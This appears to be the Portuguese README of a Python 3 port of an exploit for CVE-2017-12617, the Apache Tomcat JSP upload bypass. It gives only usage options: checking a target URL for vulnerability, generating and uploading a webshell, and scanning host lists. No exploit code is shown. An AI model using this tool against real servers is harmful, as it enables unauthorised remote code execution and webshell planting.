
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - Bypass de Upload JSP / Execução Remota de Código para Python3
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - Bypass de Upload JSP / Execução Remota de Código para Python3
Acabei de fazer alguns ajustes no script original para torná-lo compatível com Python 3!
Se houver algum problema ou dificuldade, sinta-se à vontade para me enviar um e-mail para [email protected], ou pode me chamar também, se quiser.
Não julgue meu e-mail, ele é usado como um descartável
./cve-2017-12617.py [options]
opções:
-u ,--url [::] verifica se a URL do alvo é vulnerável
-p,--pwn [::] gera webshell e faz o upload dela
-l,--list [::] lista de hosts
[+]uso:
./cve-2017-12617.py -u http://127.0.0.1
./cve-2017-12617.py --url http://127.0.0.1
./cve-2017-12617.py -u http://127.0.0.1 -p pwn
./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
./cve-2017-12617.py -l hotsts.txt
./cve-2017-12617.py --list hosts.txt